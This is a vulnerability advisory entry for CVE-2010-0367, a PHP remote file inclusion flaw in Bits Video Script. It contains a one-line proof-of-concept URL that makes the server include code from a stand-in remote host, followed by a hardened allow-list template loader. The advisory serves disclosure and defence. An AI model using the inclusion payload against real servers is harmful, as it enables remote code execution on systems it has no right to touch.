BitScripts Bits Video Script Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1118924
Vulnerability type: code injection
Published: 2010-01-18
Updated: 2010-01-18
CVE: CVE-2010-0367
CNNVD ID: CNNVD-201001-218
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/34116
https://www.securityfocus.com/bid/40709
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-218
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in BitScripts Bits Video Script 2.05 Gold Beta, and possibly in 2.04. A remote attacker can execute arbitrary PHP code by supplying a URL in the rowptem[template] parameter of (1) showcasesearch.php or (2) showcase2search.php.
|Vulnerability exploit
source: http://www.securityfocus.com/bid/40709/info

Bits Video Script is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

Bits Video Script 2.05 Gold Beta is vulnerable; other versions may also be affected.

http://www.example.com/Video/showcasesearch.php?rowptem[template]=http://www.example.net/c.txt?
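As an added defensive illustration (not code from Bits Video Script, whose actual showcasesearch.php source is not on this page), the following PHP loader takes the same rowptem[template] parameter but only ever includes a file from a fixed local allow-list, which is the standard fix for this class of remote file inclusion. The templates/ directory, the template names and the resolve_template() helper are assumptions for the example.

```php
<?php
// Added example, not the project's code. Assumes templates live in
// ./templates/ and that the page reads $_GET['rowptem']['template'].
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';

// Fixed allow-list of template names. Anything not listed is rejected,
// so a URL ("http://...") or a traversal string never reaches include().
const ALLOWED_TEMPLATES = ['default', 'compact', 'grid'];

/**
 * Map a user-supplied template name to a local file path, or null if
 * the request is not exactly one of the allowed names.
 */
function resolve_template(mixed $requested): ?string
{
    if (!is_string($requested)) {                 // arrays, null, ints: reject
        return null;
    }
    if (!in_array($requested, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    $path = realpath(TEMPLATE_DIR . '/' . $requested . '.php');
    // Defence in depth: the resolved path must still sit inside TEMPLATE_DIR.
    $base = realpath(TEMPLATE_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// The pattern the advisory describes, shown for contrast (do not use):
//   include($rowptem['template']);   // with allow_url_include=On this loads a remote URL
//
// Hardened use:
$rowptem  = $_GET['rowptem'] ?? [];
$template = resolve_template(is_array($rowptem) ? ($rowptem['template'] ?? null) : null);
if ($template === null) {
    http_response_code(400);
    exit('Unknown template');
}
include $template;
```

Independently of the code fix, setting allow_url_include=Off (and allow_url_fopen=Off where the application permits) in php.ini removes the remote-URL path for every include on the host.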
|Affected products
BitScripts Bits Video Script 2.05 Gold Beta
|References

Source: XF
Name: bitsvideo-showcasesearch-file-include(55740)
Link: http://xforce.iss.net/xforce/xfdb/55740
Source: MISC
Link: http://www.packetstormsecurity.com/1001-exploits/bitsvs-xssuploadrfi.txt